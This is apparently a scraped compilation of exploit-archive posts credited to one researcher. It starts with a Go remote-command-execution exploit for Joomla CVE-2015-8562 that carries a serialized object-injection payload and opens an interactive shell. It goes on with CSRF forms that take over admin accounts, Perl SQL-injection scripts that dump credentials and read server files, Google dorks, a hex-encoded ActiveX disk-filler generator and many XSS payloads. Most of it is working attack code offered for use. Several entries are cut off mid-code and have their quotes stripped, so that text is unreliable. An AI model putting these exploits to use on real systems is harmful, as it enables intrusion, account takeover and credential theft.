Joomla 1.5.x to 3.4.5 Object Injection Exploit (golang)
package main
/*
**
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE
* IS ON YOUR OWN RESPONSIBILITY
**
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**
* DEMO :
$ ./exploit 192.168.1.113/joomla
###
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###
Attacking to http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMANDexecute system command
eval phpcodeevaluate PHP Code
helpdisplay this help
exitclose exploit console
[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')
root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20
UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$
*/
import (
"fmt"
"net/http"
"regexp"
"os"
"io/ioutil"
"bytes"
"net/http/cookiejar"
"net/url"
"bufio"
"strings"
)
var target string;
var helpString=`# Command Line Documentation :
read FILEPATH read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMANDexecute system command
eval phpcodeevaluate PHP Code
helpdisplay this help
exitclose exploit console
[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')
`
var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")
var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")
var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")
var newLine=regexp.MustCompile("[\\n\\r]")
var client *http.Client
func newRequest(command string) *http.Request{
values:=url.Values{}
values.Set("1","echo('iMH3r3=');"+command+";")
req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))
if err!=nil{
panic(err)
}
req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
return req
}
func escape(str string) string{
return strings.Replace(str,"'","\\'",-1)
}
func runCommand(command string){
res,err:=client.Do(newRequest(command))
if err!=nil{
fmt.Println(err.Error())
}else{
defer res.Body.Close()
resBytes,err:=ioutil.ReadAll(res.Body)
str:=string(resBytes)
if err!=nil{
fmt.Println(err)
}
match:=resultRegex.FindStringSubmatch(str)
if len(match)>0{
fmt.Print(match[0][7:])
}
}
}
func confirm() bool{
res,err:=client.Do(newRequest(""))
if err!=nil{
fmt.Println(err)
return false
}else{
if res.StatusCode==500{
fmt.Println("Patched PHP Version :( !")
return false
}
defer res.Body.Close()
resBytes,err:=ioutil.ReadAll(res.Body)
str:=string(resBytes)
if err!=nil{
fmt.Println(err)
}
match:=resultRegex.FindStringSubmatch(str)
if len(match)>0{
return true
}else{
return false
}
}
}
func main(){
fmt.Print(`###
# Joomla Remote Command Execution 0day Exploit
#
RecordPress Multiple Vulnerabilities
WebApplication : RecordPress 0.3.1 Type of vunlnerability : CSRF ( Change Admin Password ) And XSS Risk of use : Medium Producer Website : http://www.recordpress.org/ Discovered by : Khashayar Fereidanis Team Website : http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com Facebook : http://facebook.com/fereidani CSRF For Change Admin Password : html head/head body onLoad=javascript:document.form.submit() form action=http://examplesite/admin/rp-settings-users-edit-db.php?id=1;; method=POST name=form input type=hidden name=formusername value=admin input type=hidden name=formname value=admin input type=hidden name=formemail value=em...@pwnedpwnedpwned.sss input type=hidden name=formpass value=password input type=hidden name=formpass2 value=password input type=hidden name=formadminstatus value=2 input type=hidden name=rp-settings-users-edit-db value=Confirm+%BB /form /body /html Cross Site Scripting Vulnerabilities : http://examplesite/header.php?row[titledesc]=scriptalert(123)/script http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=scriptalert(123)/script
Linksys Cisco Wag120N CSRF Vulnerability
Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High Producer Website : http://linksysbycisco.com Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=1 input type=hidden name=h_user_list value=1 input type=hidden name=sysname value=admin input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=no input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set pass_is_none=yes html head/head body onLoad=javascript:document.form.submit() form action=http://192.168.1.1/setup.cgi;; method=POST name=form input type=hidden name=user_list value=2 input type=hidden name=h_user_list value=2 input type=hidden name=sysname value=ircrash input type=hidden name=sysPasswd value=password input type=hidden name=sysConfirmPasswd value=password input type=hidden name=remote_management value=enable input type=hidden name=http_wanport value=8080 input type=hidden name=upnp_enable value=enable input type=hidden name=wlan_enable value=enable input type=hidden name=igmp_proxy_enable value=enable input type=hidden name=save value=Save+Settings input type=hidden name=h_pwset value=yes input type=hidden name=sysname_changed value=yes input type=hidden name=pwchanged value=yes input type=hidden name=pass_is_default value=false input type=hidden name=h_remote_management value=enable input type=hidden name=pass_is_none value=yes input type=hidden name=h_upnp_enable value=enable input type=hidden name=h_wlan_enable value=enable input type=hidden name=h_igmp_proxy_enable value=enable input type=hidden name=todo value=save input type=hidden name=this_file value=Administration.htm input type=hidden name=next_file value=Administration.htm input type=hidden name=message value= input type=hidden name=h_wps_cur_status value= /form /body /html
SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani
|| Script : SMF (Simple Machine Forum) 1.1.11
|| Vulnerability Type : Active XSS ( Active Cross Site Scripting )
|| Risk : Low
|| Discovered By Khashayar Fereidani
|| http://ircrash.com http://bugtraq.ircrash.com
|| Note :
For use this vulnerability you need access to censor words panel .
1.First login and go to :
http://site/path/index.php?action=postsettings;sa=censor
click on Click here to add another word. for add new row .
set new text box : ircrash = scriptalert('Vulnerable')/script
and save page .
2.Open new typic and set title : ircrash , fill all fields and post typic .
3.Open forum home page . you see alert : Vulerable
You can set any html or java script code . hackers can home deface forum or set
activex for virus .
|| Solution : filter censor page variables with htmlspecialchars .
|| Tnx : Only For God
COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit)
#!/usr/bin/perl ### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com Http://Fereidani.ir # ### # Help : # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash\ # Please enter number of copy cmd to folder (1 or more for example) : 1 # ** Ok comraider.html created , now you can use this ### # Tnx : Only for God ### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = stdin; print Please enter number of copy cmd to folder (1 or more for example) : ; $number = stdin; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr(0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).chr(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr(0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).chr(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr(0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).chr(0x76).chr(0x65).chr(0x72).chr(0x65).chr (0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x61).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).chr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr(0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x63).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A). chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).chr(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr(0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34).chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr(0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr(0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr(0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29).chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20
PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
Script : PHP-Fusion Mod vArcade 1.8 Type : Sql Injection Vulnerability Risk : High Download From : http://venue.nu/ Discovered by : Khashayar Fereidani My Official Website : HTTP://FEREIDANI.IR Our Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Sql Injection Vulnerability : Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/* Google Dark : inurl:/infusions/varcade/ Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Re: Re: Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Hi , Attacker can bypass disable_functions mod_security safe_mode ... with this vulnerability . I think this is good reason ! http://fereidani.ir - Khashayar Fereidani
Cpanel 11.x Local File Inclusion Cross Site Scripting - Discovered By Khashayar Fereidani
Script : Cpanel 11.x Type : Local File Inclusion Cross Site Scripting Risk : High Discovered by : Khashayar Fereidani I am 17 Years Old My Official Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Local File Inclusion Vulnerability : Note : Rename your shell to config.php and upload with your ftp account in ./ directory , now login in cpanel and enter vulnerable address in url https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAheadscriptpath_show=/home/[youruser]/ Cross site scripting : File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 Set Action as Upgrade%20to%201.7.4 Vulnerable Variables : $localapp $updatedir $scriptpath_show $domain_show $thispage $thisapp $currentversion For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#!/usr/bin/perl
#
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File
Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid=
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :
http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=scriptalert(document.cookie)/script
#Xss 2 :
show.php?imageid=156size=''?''scriptalert(document.cookie)/script
#Xss 3 : show.php?imageid=scriptalert(document.cookie)/script
#
#
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#
#Sql Injection :
#
#Injection 1 : show.php?imageid=sql
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname=Ezphotogallery 2.1;
sub header
{
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul =
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
$vul =
/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :*
* Mod 1
PhsBlog v0.2 Bypass Sql injection Filtering Exploit
#!/usr/bin/perl
#
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname=PhsBlog v0.2;
sub header
{
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul =
/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
$vul =
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* $scriptname
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :*
* Mod 1 : Find Script username and password*
* Mod 2 : File Disclosure(not work in many servers)*
;
print \n \n Enter Mod : ;
$mod=stdin;
if ($mod==1 or $mod==2) { print \n Exploiting .. \n; } else {
print \n Unknown Mod ! \n Exploit Failed !; };
if ($mod==1) { xpl1(); };
if ($mod==2) { xpl2(); };
Nooms 1.1
Script : Nooms 1.1
Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute
Force Local Access)
Risk : Medium
Download From :
http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
Mysql Remote Brute Force Vulnerability :
This is new type of the vulnerabilities .
I can't public Exploit of this vulnerability ,
But with this vulnerability attacker can brute force root and other user
password with php in remote mode .
Mysql Brute Force Vulnerability :
/db.php?g_dbhost=localhostg_dbuser=[username]g_dbpwd=[password]
Cross Site Scripting Vulnerabilities :
Xss 1 : http://Example/smileys.php?page_id=scriptalert('xss')/script
Xss 2 : http://Example/search.php?q=;scriptalert('xss')/script
Redirect Vulnerability :
Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani
Script : Mambo 4.6.2 Full Older Versions
Type : Multiple Cross Site Scripting Vulnerabilities
Alert Level : Medium
Download From :
http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip
Discovered by : Khashayar Fereidani
My Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
Cross Site Scripting Vulnerability 1 :
Vulnerable File : administrator/popups/index3pop.php
Vulnerable Line (5) : title?php echo $mosConfig_sitename; ? -
Administration [Mambo]/title
Vulnerable Variable : mosConfig_sitename
For Example :
http://Example/administrator/popups/index3pop.php?mosConfig_sitename=/titlescriptalert(document.cookie)/script
Attacker can hijack administrator cookie and session and login with they
Cross Site Scripting Vulnerability 2 :
Vulnerable File :
mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?
Vulnable Variable : Any Variable - You can set any variable
For Example set (hacker) variable :
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=scriptalert('xss')/script
you can set cross site scripting code in variable name :
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?scriptalert('xss')/script=Hello+Word
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
FlexCMS = 2.5 Cross Site Scripting Vulnerability
Script : FlexCMS = 2.5 Type : Cross Site Scripting Vulnerability Alert : Low Download From : http://www.flexcms.com/ Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability : File Name : inc-core-admin-editor-previouscolorsjs.php Vulnerable Variable : PreviousColorsString Send Method : GET Register_globals : On Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');'; Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=scriptalert(document.cookie)/script Attacker can hijack admin cookie with this vulnerability Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ... Tnx : God HTTP://IRCRASH.COM
Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities
Script : Pluck 4.5.2 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://www.pluck-cms.org/downloads/pluck-4_5_2.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Our Team Website : HTTP://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : All vulnerabilities work when register_globals set as on , XSS Vulnerability 1 : /data/inc/footer.php = http://Example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting] XSS Vulnerability 2 : /data/inc/header.php = http://Example.com/data/inc/header.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 3 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_install22=[Cross Site Scripting] XSS Vulnerability 4 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] XSS Vulnerability 5 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting] XSS Vulnerability 6 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting] XSS Vulnerability 7 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_modules=[Cross Site Scripting] XSS Vulnerability 8 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting] XSS Vulnerability 9 : /data/inc/header.php = http://Example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting] XSS Vulnerability 10 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting] XSS Vulnerability 11 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] 